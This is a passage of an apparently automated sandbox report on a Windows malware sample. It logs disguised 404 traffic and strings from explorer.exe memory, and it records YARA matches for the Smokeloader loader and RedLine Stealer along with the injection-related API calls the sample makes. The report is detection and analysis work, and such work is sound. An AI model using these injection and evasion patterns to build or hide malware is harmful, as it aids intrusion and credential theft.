      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:09:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:09:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:09:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:09:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:09:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:09:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:09:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:09:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:10:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:11:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: explorer.exe, 00000002.00000000.2125963281.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2125963281.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 00000002.00000000.2122001915.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
      Source: explorer.exe, 00000002.00000000.2125963281.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2125963281.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 00000002.00000000.2125963281.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2125963281.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: explorer.exe, 00000002.00000000.2125963281.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2125963281.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 00000002.00000000.2125963281.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: explorer.exe, 00000002.00000000.2125269917.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2125238364.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2124617675.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 00000002.00000000.2130431930.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
      Source: explorer.exe, 00000002.00000000.2123955019.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000002.00000000.2125963281.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000002.00000000.2123955019.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000002.00000000.2122929961.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
      Source: explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: explorer.exe, 00000002.00000000.2125963281.0000000009B90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
      Source: explorer.exe, 00000002.00000000.2130431930.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
      Source: explorer.exe, 00000002.00000000.2125963281.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
      Source: explorer.exe, 00000002.00000000.2125963281.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
      Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.5:50001 version: TLS 1.2

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2420146039.0000000002F01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2148008408.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2147911658.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 00000004.00000002.2419877592.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000004.00000002.2420146039.0000000002F01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.2147151739.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000004.00000002.2420034001.0000000002D07000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.2148008408.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.2147911658.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.2147438487.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,NtEnumerateKey,0_2_00403277
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401514
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_00402F97 RtlCreateUserThread,NtTerminateProcess,4_2_00402F97
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401542
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_00403247 NtTerminateProcess,GetModuleHandleA,4_2_00403247
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401549
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_0040324F NtTerminateProcess,GetModuleHandleA,4_2_0040324F
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_00403256 NtTerminateProcess,GetModuleHandleA,4_2_00403256
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401557
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_0040326C NtTerminateProcess,GetModuleHandleA,4_2_0040326C
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_00403277 NtTerminateProcess,GetModuleHandleA,4_2_00403277
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014FE
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_00403290 NtTerminateProcess,GetModuleHandleA,4_2_00403290
      Source: C:\Users\user\Desktop\mGFoU1INUk.exeCode function: 0_2_00415BA00_2_00415BA0
      Source: C:\Users\user\AppData\Roaming\ibjguehCode function: 4_2_00415BA04_2_00415BA0
      Source: B995.exe.2.drStatic PE information: Data appended to the last section found
      Source: mGFoU1INUk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000004.00000002.2419877592.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000004.00000002.2420146039.0000000002F01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
